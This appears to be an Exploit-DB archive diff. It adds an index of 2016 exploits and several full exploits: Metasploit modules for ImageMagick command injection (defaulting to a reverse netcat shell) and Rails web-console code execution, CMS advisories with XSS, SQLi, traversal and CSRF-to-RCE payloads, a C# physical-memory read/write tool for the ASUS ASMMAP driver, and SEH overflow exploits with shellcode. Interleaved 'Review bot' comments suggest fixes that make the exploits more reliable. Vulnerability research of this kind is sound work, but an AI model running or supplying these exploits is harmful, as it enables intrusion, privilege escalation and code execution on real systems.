39735,platforms/windows/remote/39735.rb,"Advantech WebAccess Dashboard Viewer Arbitrary File Upload",2016-04-26,metasploit,windows,remote,80
@ -35993,3 +35993,13 @@ id,file,description,date,author,platform,type,port
39778,platforms/windows/dos/39778.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts",2016-05-06,"Google Security Research",windows,dos,0
39779,platforms/windows/dos/39779.txt,"Adobe Flash - MovieClip.duplicateMovieClip Use-After-Free",2016-05-06,"Google Security Research",windows,dos,0
39780,platforms/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",jsp,webapps,443
39781,platforms/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,php,webapps,80
39782,platforms/windows/local/39782.py,"i.FTP 2.21 - Host Address / URL Field SEH Exploit",2016-05-09,"Tantaryu MING",windows,local,0
39783,platforms/windows/remote/39783.py,"Dell SonicWall Scrutinizer <= 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,windows,remote,0
39784,platforms/php/webapps/39784.txt,"ZeewaysCMS - Multiple Vulnerabilities",2016-05-09,"Bikramaditya Guha",php,webapps,80
39785,platforms/windows/dos/39785.cs,"ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write",2016-05-09,slipstream,windows,dos,0
39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0
39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)",2016-05-09,hex0r,windows,local,0
39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0
39791,platforms/multiple/local/39791.rb,"ImageMagick Delegate Arbitrary Command Execution",2016-05-09,metasploit,multiple,local,0
39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,metasploit,ruby,remote,3000



@ -0,0 +1,87 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'ImageMagick Delegate Arbitrary Command Execution',
'Description' => %q{
This module exploits a shell command injection in the way "delegates"
(commands for converting files) are processed in ImageMagick versions
<= 7.0.1-0 and <= 6.9.3-9 (legacy).
Since ImageMagick uses file magic to detect file format, you can create
a .png (for example) which is actually a crafted SVG (for example) that
triggers the command injection.
Tested on Linux, BSD, and OS X. You'll want to choose your payload
carefully due to portability concerns. Use cmd/unix/generic if need be.
},
'Author' => [
'stewie', # Vulnerability discovery
'Nikolay Ermishkin', # Vulnerability discovery
'wvu', # Metasploit module
'hdm' # Metasploit module
],
'References' => [
%w{CVE 2016-3714},
%w{URL https://imagetragick.com/},
%w{URL http://seclists.org/oss-sec/2016/q2/205},
%w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
%w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
],
'DisclosureDate' => 'May 3 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {
'BadChars' => "\x22\x27\x5c", # ", ', and \
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic netcat bash-tcp'
}
},
'Targets' => [
['SVG file', template: 'msf.svg'], # convert msf.png msf.svg
['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg
['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat',
'LHOST' => Rex::Socket.source_address,
'DisablePayloadHandler' => false,
'WfsDelay' => 9001
}
))
register_options([
OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
])
end
def exploit
if target.name == 'SVG file'
p = Rex::Text.html_encode(payload.encoded)
else
p = payload.encoded
end
file_create(template.sub('echo vulnerable', p))
end
def template
File.read(File.join(
Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
))
end
end

69
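--- /dev/null
+++ b/platforms/php/webapps/39781.txt
@@ -0,0 +1,69 @@
+Ajaxel CMS 8.0 Multiple Vulnerabilities
+Vendor: Ajaxel
+Product web page: http://www.ajaxel.com
+Affected version: 8.0 and below
+Summary: Ajaxel CMS is very simple ajaxified CMS and framework
+for any project needs.
+Desc: Ajaxel CMS version 8.0 and below suffers from multiple
+vulnerabilities inlcuding LFI, XSS, SQL injection and remote
+code execution via CSRF.
+Tested on: Apache 2.4.10
+MySQL 5.5.46
+Vendor status:
+[13.04.2016] Vulnerabilities discovered.
+[14.04.2016] Vendor contacted.
+[18.04.2016] Vendor releases patch for version 8.0 to address these issues.
+[05.05.2016] Public security advisory released.
+Vulnerability discovered by Krzysztof 'DizzyDuck' Kosinski
+[dizzyduck_at_zeroscience.mk]
+1. Reflected XSS:
+-----------------
+GET /cmsj9bwp'-alert(1)-'xvjry=mods/ HTTP/1.1
+Host: 192.168.10.5
+HTTP/1.0 404 Not Found
+...
+...var Conf={LANG:'en', TPL:'default', DEVICE:'pc', SESSION_LIFETIME:7200,
+USER_ID:1, URL_EXT:'', HTTP_EXT:'/', FTP_EXT:'/',
+REFERER:'/cmsj9bwp'-alert(1)-'xvjry=mods', VERSION:8.0,
+URL_KEY_ADMIN:'cms',...
+2. SQL Injection:
+-----------------
+http://192.168.10.5/cms=mods/tab=ai?mods_ai_tab_ai-submitted=1&f=<SQLi>
+3. Local File Disclosure:
+-------------------------
+http://192.168.10.5/?window&cms=templates&popup=1&file_folder=cms&folder=&file=../../../../../../../../../../../../etc/passwd
+4. Cross-Site Request Forgery - RCE PoC:
+----------------------------------------
+<html>
+<body>
+<form action="http://192.168.10.5/cms=settings_eval_tab/tab=eval/load"
+method="POST">
+<input type="hidden" name="data&#91;eval&#93;"
+value="phpinfo&#40;&#41;&#59;" />
+<input type="hidden" name="a" value="eval" />
+<input type="hidden"
+name="settings&#95;eval&#95;tab&#95;eval&#45;submitted" value="1" />
+<input type="submit" value="Execute" />
+</form>
+</body>
+</html>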
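Review bot: The CSRF-to-RCE form in section 4 only fires while the victim holds an authenticated administrator session in the CMS, and the advisory never states that precondition; a line such as `Requires a logged-in administrator to visit the attacker page; the PoC implies the eval endpoint accepts the POST without any CSRF token` above the form would make the attack scenario explicit. Section 2 gives the SQL injection only as `f=<SQLi>` with no payload, error text or timing evidence, so it can neither be reproduced nor triaged — add one concrete payload and the observed response. Nothing says what the 18.04.2016 patch changed (a CSRF token on the eval endpoint, JS-escaping of the `REFERER` value echoed into the `Conf` object in section 1, canonicalising `file` in section 3), so include the fixed version string an operator can check for.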

94
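--- /dev/null
+++ b/platforms/php/webapps/39784.txt
@@ -0,0 +1,94 @@
+ZeewaysCMS Multiple Vulnerabilities
+[Software]
+- ZeewaysCMS
+[Vendor Product Description]
+- ZeewaysCMS is a Content Management System and a complete Web & Mobile Solution developed by Zeeways for Corporates,
+Individuals or any kind of Business needs.
+- Site: http://www.zeewayscms.com/
+[Advisory Timeline]
+[25.03.2016] Vulnerability discovered.
+[25.03.2016] Vendor contacted.
+[29.03.2016] Follow up with the vendor.
+[29.03.2016] Vendor responded asking for details.
+[29.03.2016] Advisory and details sent to the vendor.
+[06.04.2016] Follow up with the vendor. No response received.
+[06.05.2016] Public security advisory released.
+[Bug Summary]
+- Directory Traversal
+- Cross Site Scripting (Stored)
+[Impact]
+- High
+[Affected Version]
+- Unknown
+[Tested on]
+- Apache/2.2.27
+- PHP/5.4.28
+[Advisory]
+- ID: ZSL-2016-5319
+- URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5319.php
+[Bug Description and Proof of Concept]
+- ZeewaysCMS suffers from a file inclusion vulnerability (LFI) when encoded input passed thru the 'targeturl' GET
+parameter is not properly verified before being used to include files. This can be exploited to include files from
+local resources with directory traversal attacks and URL encoded NULL bytes.
+https://en.wikipedia.org/wiki/Directory_traversal_attack
+- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed
+via multiple parameters is not properly sanitized before being returned to the user. This can be exploited to
+execute arbitrary HTML and script code in a user's browser session in context of an affected site.
+https://en.wikipedia.org/wiki/Cross-site_scripting
+[Proof-of-Concept]
+1. Directory Traversal:
+http://localhost/demo//createPDF.php?targeturl=Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q=&&pay_id=4&&type=actual
+Parameters: targeturl (GET)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+2. Cross Site Scripting (Stored)
+http://localhost/demo/profile
+Parameters: screen_name, f_name, l_name, uc_email, uc_mobile, user_contact_num (POST)
+Payload(s):
+Content-Disposition: form-data; name="screen_name"
+"><script><<imgIMG SRC=oi onerror=JaVaScript:alert(1)>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+All flaws described here were discovered and researched by:
+Bikramaditya Guha aka "PhoenixX"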
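Review bot: The `targeturl` value in the traversal PoC is base64 (`Ly4uLy4u…` decodes to `/../../../../../../../../etc/passwd`), yet the description says the inclusion is reached with URL-encoded NULL bytes and the PoC contains none; either state that no terminator is needed for this path, or show the variant that needs `%00`, so a reader knows which sink is in play — the vulnerable code is not shown. Showing the decoded string next to the encoded one would also stop people re-encoding it wrongly. Affected version is `Unknown`, so the advisory cannot tell an operator whether a given deployment is exposed; the `[Tested on]` entries describe Apache and PHP, not a ZeewaysCMS build. The stored-XSS payload `"><script><<imgIMG SRC=oi onerror=…>` looks like a filter-bypass variant; naming the filter it defeats would make the fix (context-aware output encoding of the six profile fields listed) testable.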

87
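--- /dev/null
+++ b/platforms/ruby/remote/39792.rb
@@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::HttpClient
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Ruby on Rails Development Web Console (v2) Code Execution',
+'Description' => %q{
+This module exploits a remote code execution feature of the Ruby on Rails
+framework. This feature is exposed if the config.web_console.whitelisted_ips
+setting includes untrusted IP ranges and the web-console gem is enabled.
+},
+'Author' => ['hdm'],
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'URL', 'https://github.com/rails/web-console' ]
+],
+'Platform' => 'ruby',
+'Arch' => ARCH_RUBY,
+'Privileged' => false,
+'Targets' => [ ['Automatic', {} ] ],
+'DefaultOptions' => { 'PrependFork' => true },
+'DisclosureDate' => 'May 2 2016',
+'DefaultTarget' => 0))
+register_options(
+[
+Opt::RPORT(3000),
+OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', '/missing404' ])
+], self.class)
+end
+#
+# Identify the web console path and session ID, then inject code with it
+#
+def exploit
+res = send_request_cgi({
+'uri' => normalize_uri(target_uri.path),
+'method' => 'GET'
+}, 25)
+unless res
+print_error("Error: No response requesting #{datastore['TARGETURI']}")
+return
+end
+unless res.body.to_s =~ /data-mount-point='([^']+)'/
+if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump')
+print_error('Error: The web console is either disabled or you are not in the whitelisted scope')
+else
+print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}")
+end
+return
+end
+console_path = normalize_uri($1, 'repl_sessions')
+unless res.body.to_s =~ /data-session-id='([^']+)'/
+print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
+return
+end
+session_id = $1
+print_status("Sending payload to #{console_path}/#{session_id}")
+res = send_request_cgi({
+'uri' => normalize_uri(console_path, session_id),
+'method' => 'PUT',
+'headers' => {
+'Accept' => 'application/vnd.web-console.v2',
+'X-Requested-With' => 'XMLHttpRequest'
+},
+'vars_post' => {
+'input' => payload.encoded
+}
+}, 25)
+end
+end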
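Review bot: The response from the final PUT in `exploit` is stored in `res` and never examined, so a non-200 answer (wrong `repl_sessions` mount, stale `data-session-id`, connection dropped) produces no output and the module reports only "Sending payload" as if it had worked. Add `unless res && res.code == 200` / `print_error("Error: Unexpected response #{res ? res.code : 'none'} from #{console_path}/#{session_id}")` after the request so a failed injection is visible without waiting on the handler. The description would also benefit from one sentence saying this is a misconfiguration rather than a code defect — web-console is a development aid, and the defensive action is to drop it from production bundles or keep `config.web_console.whitelisted_ips` at loopback — so whoever triages a hit knows what to recommend.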

217
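--- /dev/null
+++ b/platforms/windows/dos/39785.cs
@@ -0,0 +1,217 @@
+/*
+Source: http://rol.im/asux/
+ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write
+PoC by slipstream/RoL - https://twitter.com/TheWack0lian - http://rol.im/chat/
+The ASUS "Generic Function Service" includes a couple of drivers, ASMMAP.sys / ASMMAP64.sys,
+the version resources describe them as "Memory mapping Driver".
+This description is very accurate, it has a pair of ioctls, 0x9C402580 and 0x9C402584, that map or
+unmap to the calling process' address space ANY PART OF PHYSICAL MEMORY, with READ/WRITE permissions.
+Using code that has been copypasta'd a bunch of times, but seems to originate from a sample driver for NT 3.1.
+1993 vintage code, everybody.
+It also has a couple of other ioctls that allocate or free some RAM and gives the physical and virtual pointers
+to it, and another one that can make any I/O request (does in/out byte/word/dword with parameters given in the ioctl buffer,
+and returns the result for the case of in). These.. don't really matter, I guess? Well, I guess you could mess with SMM
+or other issues easily...
+This PoC can dump a block of physical memory to disk, and write to a block of physical memory from a file.
+I wrote it in C# so others can easily add the ASMMap_MapMem class to their powershell exploitation frameworks, if they so want.
+To ASUS: MS locked PhysicalMemory down in 2004. Don't use 1993 code to remove the restrictions, and let even unprivileged users
+access it (where back before it was locked to ring0, only SYSTEM could access it).
+To MS: why did you even sign asmmap/asmmap64? Probably automation. Come on, why does signing even exist if you sign whatever driver
+an OEM asks you to, without checking?
+*/
+// This uses pointers, so compile with /unsafe.
+using System;
+using System.ComponentModel;
+using System.Globalization;
+using System.IO;
+using System.Runtime.InteropServices;
+using Microsoft.Win32.SafeHandles;
+public class ASMMap_MapMem : IDisposable {
+public const uint IOCTL_MAPMEM = 0x9C402580;
+public const uint IOCTL_UNMAPMEM = 0x9C402584;
+[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
+public static extern SafeFileHandle CreateFile(
+string lpFileName,
+[MarshalAs(UnmanagedType.U4)] FileAccess dwDesiredAccess,
+[MarshalAs(UnmanagedType.U4)] FileShare dwShareMode,
+IntPtr lpSecurityAttributes,
+[MarshalAs(UnmanagedType.U4)] FileMode dwCreationDisposition,
+[MarshalAs(UnmanagedType.U4)] FileAttributes dwFlagsAndAttributes,
+IntPtr hTemplateFile);
+[DllImport("kernel32.dll", SetLastError = true)]
+static extern bool DeviceIoControl(
+SafeFileHandle hDevice,
+uint IoControlCode,
+ref MapMemIoctl InBuffer,
+int nInBufferSize,
+ref MapMemIoctl OutBuffer,
+int nOutBufferSize,
+IntPtr pBytesReturned,
+IntPtr Overlapped
+);
+[StructLayout(LayoutKind.Sequential)]
+public unsafe struct MapMemIoctl {
+public ulong PhysicalAddress;
+public byte* VirtualAddress;
+[MarshalAs(UnmanagedType.ByValArray, SizeConst=2)]
+public uint[] Length;
+public MapMemIoctl(SafeFileHandle asmmap,ulong PhysicalAddress,uint Length) {
+this.PhysicalAddress = PhysicalAddress;
+// Length[0] is used with ASMMAP64, Length[1] by ASMMAP. Set both here, ASMMAP will overwrite Length[0] anyway.
+this.Length = new uint[2];
+this.Length[0] = Length;
+this.Length[1] = Length;
+this.VirtualAddress = null;
+// Fire the ioctl
+Console.WriteLine("[*] Mapping 0x{0}-0x{1} into this process' address space...",PhysicalAddress.ToString("X"),(PhysicalAddress+Length).ToString("X"));
+if (!DeviceIoControl(asmmap,IOCTL_MAPMEM,ref this,Marshal.SizeOf(typeof(MapMemIoctl)),ref this,Marshal.SizeOf(typeof(MapMemIoctl)),IntPtr.Zero,IntPtr.Zero)) {
+throw new Win32Exception();
+}
+Console.WriteLine("[+] Mapped at 0x{0}",new IntPtr(this.VirtualAddress).ToInt64().ToString("X"));
+}
+}
+private MapMemIoctl mm;
+private SafeFileHandle asmmap = null;
+private bool ShouldDisposeOfAsmMap = false;
+private bool HasBeenDisposed = false;
+public uint Length {
+get {
+if (this.HasBeenDisposed) throw new ObjectDisposedException("ASMMap_MapMem");
+return mm.Length[ ( IntPtr.Size == 4 ? 1 : 0 ) ];
+}
+}
+public UnmanagedMemoryStream PhysicalMemoryBlock {
+get {
+if (this.HasBeenDisposed) throw new ObjectDisposedException("ASMMap_MapMem");
+unsafe {
+return new UnmanagedMemoryStream(mm.VirtualAddress,this.Length,this.Length,FileAccess.ReadWrite);
+}
+}
+}
+public ASMMap_MapMem(ulong PhysicalAddress,uint Length) : this(null,PhysicalAddress,Length) {
+}
+public ASMMap_MapMem(SafeFileHandle asmmap,ulong PhysicalAddress,uint Length) {
+if (asmmap == null) {
+asmmap = CreateFile("\\\\.\\ASMMAP" + (IntPtr.Size == 8 ? "64" : ""),FileAccess.ReadWrite,FileShare.None,
+IntPtr.Zero,FileMode.Create,FileAttributes.Temporary,IntPtr.Zero);
+this.ShouldDisposeOfAsmMap = true;
+}
+this.asmmap = asmmap;
+this.mm = new MapMemIoctl(asmmap,PhysicalAddress,Length);
+}
+public void Dispose() {
+if (this.HasBeenDisposed) return;
+unsafe {
+Console.WriteLine("[*] Unmapping 0x{0}-0x{1} (0x{2})...",
+mm.PhysicalAddress.ToString("X"),
+(mm.PhysicalAddress+Length).ToString("X"),
+new IntPtr(mm.VirtualAddress).ToInt64().ToString("X")
+);
+}
+try {
+if (!DeviceIoControl(asmmap,IOCTL_UNMAPMEM,ref mm,Marshal.SizeOf(typeof(MapMemIoctl)),ref mm,Marshal.SizeOf(typeof(MapMemIoctl)),IntPtr.Zero,IntPtr.Zero)) {
+throw new Win32Exception();
+}
+Console.WriteLine("[+] Unmapped successfully");
+} finally {
+// dispose of the driver handle if needed
+if (this.ShouldDisposeOfAsmMap) asmmap.Dispose();
+this.HasBeenDisposed = true;
+}
+}
+~ASMMap_MapMem() {
+this.Dispose();
+}
+}
+class asmmap {
+public static bool TryParseDecAndHex(string value,out ulong result) {
+if ((value.Length > 2) && (value.Substring(0,2) == "0x")) return ulong.TryParse(value.Substring(2),NumberStyles.AllowHexSpecifier,CultureInfo.InvariantCulture,out result);
+return ulong.TryParse(value,out result);
+}
+public static void Usage() {
+Console.WriteLine("[*] Usage: {0} <read/write> <address> <length/file>",Path.GetFileName(System.Reflection.Assembly.GetEntryAssembly().Location));
+Console.WriteLine("[*] address: starting physical address to read/write, can be decimal or hex, for hex, start with 0x");
+Console.WriteLine("[*] length: size of memory to read, can be decimal or hex, for hex, start with 0x");
+Console.WriteLine("[*] file: file whose contents will be written at <address>");
+}
+public static void Read(ulong PhysicalAddress,ulong Length) {
+uint IterationSize = ( IntPtr.Size == 8 ? (uint)0x10000000 : (uint)0x1000000 );
+using (SafeFileHandle asmmap = ASMMap_MapMem.CreateFile("\\\\.\\ASMMAP" + (IntPtr.Size == 8 ? "64" : ""),FileAccess.ReadWrite,
+FileShare.None,IntPtr.Zero,FileMode.Create,FileAttributes.Temporary,IntPtr.Zero))
+using (FileStream stream = new FileStream("" + (PhysicalAddress.ToString("X")) + "-" + ((PhysicalAddress + Length).ToString("X")) + ".bin",FileMode.Create)) {
+for (; Length > 0; Length -= IterationSize, PhysicalAddress += IterationSize) {
+using (ASMMap_MapMem mapper = new ASMMap_MapMem(asmmap,PhysicalAddress,( Length > IterationSize ? IterationSize : (uint)(Length & 0xffffffff) ))) {
+Console.WriteLine("[+] Reading block of memory...");
+mapper.PhysicalMemoryBlock.CopyTo(stream);
+}
+if ( Length <= IterationSize) break;
+}
+}
+Console.WriteLine("[+] Read successful: "+ (PhysicalAddress.ToString("X")) + "-" + ((PhysicalAddress + Length).ToString("X")) + ".bin");
+}
+public static void Write(ulong PhysicalAddress,string Filename) {
+using (FileStream stream = new FileStream(Filename,FileMode.Open))
+using (ASMMap_MapMem mapper = new ASMMap_MapMem(PhysicalAddress,(uint)stream.Length)) {
+Console.WriteLine("[+] Writing block of memory...");
+stream.CopyTo(mapper.PhysicalMemoryBlock);
+}
+}
+public static void Main(string[] args) {
+Console.WriteLine("[*] ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write");
+Console.WriteLine("[*] PoC by slipstream/RoL - https://twitter.com/TheWack0lian - http://rol.im/chat/");
+if (args.Length < 3) {
+Usage();
+return;
+}
+ulong PhysicalAddress, Length;
+switch (args[0]) {
+case "read":
+case "-read":
+case "--read":
+if ((!TryParseDecAndHex(args[1],out PhysicalAddress)) || (!TryParseDecAndHex(args[2],out Length))) {
+Usage();
+return;
+}
+Read(PhysicalAddress,Length);
+break;
+case "write":
+case "-write":
+case "--write":
+if (!TryParseDecAndHex(args[1],out PhysicalAddress)) {
+Usage();
+return;
+}
+Write(PhysicalAddress,args[2]);
+break;
+default:
+Usage();
+break;
+}
+}
+}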
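Review bot: In `asmmap.Read` the "Read successful" message uses `PhysicalAddress` and `Length` after the `for` loop has advanced the one and decremented the other, so whenever the dump spans more than one block the name it prints is not the name the `FileStream` was opened with at the top of the method. Compute the name once before the loop — `string outName = PhysicalAddress.ToString("X") + "-" + (PhysicalAddress + Length).ToString("X") + ".bin";` — and use `outName` in both the `FileStream` constructor and the final `WriteLine`. Separately, `~ASMMap_MapMem` calls `Dispose`, which throws `Win32Exception` when the unmap ioctl fails; an exception escaping a finalizer terminates the process, and the `SafeFileHandle` it touches may already have been finalized, so either drop the finalizer or wrap its body in try/catch and have `Dispose` call `GC.SuppressFinalize(this)`. The `CreateFile` result is also never tested with `IsInvalid`, so on a machine without the driver the first symptom is a `DeviceIoControl` failure rather than the real open error.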

30
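--- /dev/null
+++ b/platforms/windows/dos/39789.py
@@ -0,0 +1,30 @@
+#!/usr/bin/python
+# Exploit Title : RPCScan v2.03 Hostname/IP Field SEH Overwrite POC
+# Discovery by : Nipun Jaswal
+# Email : mail@nipunjaswal.info
+# Discovery Date : 08/05/2016
+# Vendor Homepage : http://samspade.org
+# Software Link : http://www.mcafee.com/in/downloads/free-tools/rpcscan.aspx#
+# Tested Version : 2.03
+# Vulnerability Type: SEH Overwrite POC
+# Tested on OS : Windows 7 Home Basic
+# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
+##########################################################################################
+# -----------------------------------NOTES----------------------------------------------#
+##########################################################################################
+#SEH chain of main thread
+#Address SE handler
+#0012FAA0 43434343
+#42424242 *** CORRUPT ENTRY ***
+# Offset to the SEH Frame is 536
+buffer = "A"*536
+# Address of the Next SEH Frame
+nseh = "B"*4
+# Address to the Handler Code, Generally P/P/R Address
+seh = "C" *4
+f = open("evil.txt", "wb")
+f.write(buffer+nseh+seh)
+f.close()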
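Review bot: The file is opened with `"wb"` but `buffer+nseh+seh` is a `str`, so under Python 3 `f.write` raises `TypeError`, and the `#!/usr/bin/python` shebang does not pin the interpreter; either open with `"w"` or write `(buffer+nseh+seh).encode("latin-1")`. The SEH dump in the notes (`43434343` as handler, `42424242` as the corrupt next-record pointer) is what establishes the 536-byte offset, and that is all this PoC establishes: it demonstrates a controlled SEH overwrite, not execution, so the title should be read as a crash PoC until a P/P/R address and bad-character analysis are supplied.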


@ -0,0 +1,70 @@
#!/usr/bin/python
# Exploit Title: i.FTP 2.21 Host Address / URL Field SEH Exploit
# Date: 3-5-2016
# Exploit Author: Tantaryu MING
# Vendor Homepage: http://www.memecode.com/iftp.php
# Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Version: 2.21
# Tested on: Windows 7 SP1 x86_64
# How to exploit: Connect -> Host Address / URL -> copy + paste content of evil.txt -> Press 'Connect' button
'''
msfvenom -p windows/exec CMD=calc -e x86/alpha_upper -a x86 -f c -b '\x00\x0d\x20\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferREgister=EAX
'''
shellcode = (
"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
"\x4c\x5a\x48\x4b\x32\x35\x50\x33\x30\x43\x30\x33\x50\x4d\x59"
"\x4a\x45\x36\x51\x39\x50\x42\x44\x4c\x4b\x30\x50\x56\x50\x4c"
"\x4b\x51\x42\x34\x4c\x4c\x4b\x30\x52\x35\x44\x4c\x4b\x42\x52"
"\x31\x38\x44\x4f\x58\x37\x51\x5a\x57\x56\x30\x31\x4b\x4f\x4e"
"\x4c\x47\x4c\x35\x31\x43\x4c\x53\x32\x56\x4c\x51\x30\x59\x51"
"\x58\x4f\x34\x4d\x53\x31\x49\x57\x4b\x52\x4a\x52\x50\x52\x50"
"\x57\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x50\x4a\x37\x4c\x4c\x4b"
"\x30\x4c\x54\x51\x52\x58\x4b\x53\x50\x48\x35\x51\x38\x51\x50"
"\x51\x4c\x4b\x31\x49\x47\x50\x33\x31\x48\x53\x4c\x4b\x51\x59"
"\x32\x38\x4d\x33\x47\x4a\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x35"
"\x51\x59\x46\x56\x51\x4b\x4f\x4e\x4c\x59\x51\x48\x4f\x54\x4d"
"\x45\x51\x58\x47\x57\x48\x4d\x30\x33\x45\x4a\x56\x55\x53\x53"
"\x4d\x4c\x38\x57\x4b\x33\x4d\x47\x54\x52\x55\x4b\x54\x30\x58"
"\x4c\x4b\x31\x48\x36\x44\x43\x31\x59\x43\x43\x56\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x46\x38\x35\x4c\x45\x51\x4e\x33\x4c\x4b"
"\x34\x44\x4c\x4b\x45\x51\x58\x50\x4b\x39\x51\x54\x36\x44\x57"
"\x54\x51\x4b\x31\x4b\x33\x51\x36\x39\x51\x4a\x30\x51\x4b\x4f"
"\x4b\x50\x51\x4f\x31\x4f\x30\x5a\x4c\x4b\x45\x42\x4a\x4b\x4c"
"\x4d\x51\x4d\x33\x5a\x55\x51\x4c\x4d\x4d\x55\x58\x32\x35\x50"
"\x45\x50\x45\x50\x56\x30\x33\x58\x30\x31\x4c\x4b\x42\x4f\x4d"
"\x57\x4b\x4f\x38\x55\x4f\x4b\x4a\x50\x4e\x55\x39\x32\x50\x56"
"\x52\x48\x59\x36\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x49\x45\x37"
"\x4c\x35\x56\x33\x4c\x44\x4a\x4d\x50\x4b\x4b\x4b\x50\x42\x55"
"\x33\x35\x4f\x4b\x37\x37\x55\x43\x53\x42\x52\x4f\x53\x5a\x33"
"\x30\x46\x33\x4b\x4f\x39\x45\x53\x53\x45\x31\x52\x4c\x35\x33"
"\x35\x50\x41\x41"
)
eax_zeroed = '\x25\x2E\x2E\x2E\x2E'
eax_zeroed += '\x25\x11\x11\x11\x11'
align_to_eax = "\x54\x58" # Get ESP and pop it into EAX
align_to_eax += "\x2d\x7d\x7d\x7d\x7d" # SUB EAX, 0x7d7d7d7d
align_to_eax += "\x2d\x01\x01\x01\x01" # SUB EAX, 0x01010101
align_to_eax += "\x2d\x01\x01\x02\x02" # SUB EAX, 0x02020101
align_to_eax += "\x2d\x7c\x73\x7f\x7f" # SUB EAX, 0x7f7f737c
buffer = "\x41" * 1865
buffer += "\x42\x42\x71\x04" # Pointer to Next SEH Record
buffer += "\x78\x2a\x01\x10" # SEH HANDLER
buffer += eax_zeroed
buffer += align_to_eax
buffer += "\x43" * 5
buffer += shellcode
buffer += "E" * 4
f = open('exploit.txt', "wb")
f.write(buffer)
f.close()
